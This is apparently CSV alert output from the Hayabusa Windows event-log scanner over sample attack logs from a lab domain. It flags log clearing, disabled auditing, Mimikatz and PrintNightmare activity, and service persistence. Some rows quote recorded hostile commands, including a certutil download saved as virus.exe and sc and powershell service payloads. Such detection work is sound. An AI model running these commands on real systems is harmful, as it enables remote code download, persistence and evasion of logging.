2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 05:17:07.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc create hacker-testl3 binPath=""3virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x64c | User: admmig | LID: 0x123550",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service created (command).evtx
2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-27 19:35:56.899 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf08 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3388 | PGUID: 7CF65FC7-A881-617A-0605-000000001300 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
2021-10-31 23:28:15.331 +09:00,jump01.offsec.lan,4104,low,Disc,Suspicious Get Local Groups Information,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
2021-10-31 23:28:15.342 +09:00,jump01.offsec.lan,4103,low,Disc,Suspicious Get Local Groups Information,,rules/sigma/powershell/powershell_module/posh_pm_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
2021-11-02 23:15:24.567 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: certutil -urlcache -split -f https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/blob/master/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec%20remote%20trask%20creation%20(GLOBAL).evtx virus.exe | Path: C:\Windows\System32\certutil.exe | PID: 0xedc | User: admmig | LID: 0x5ba37",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
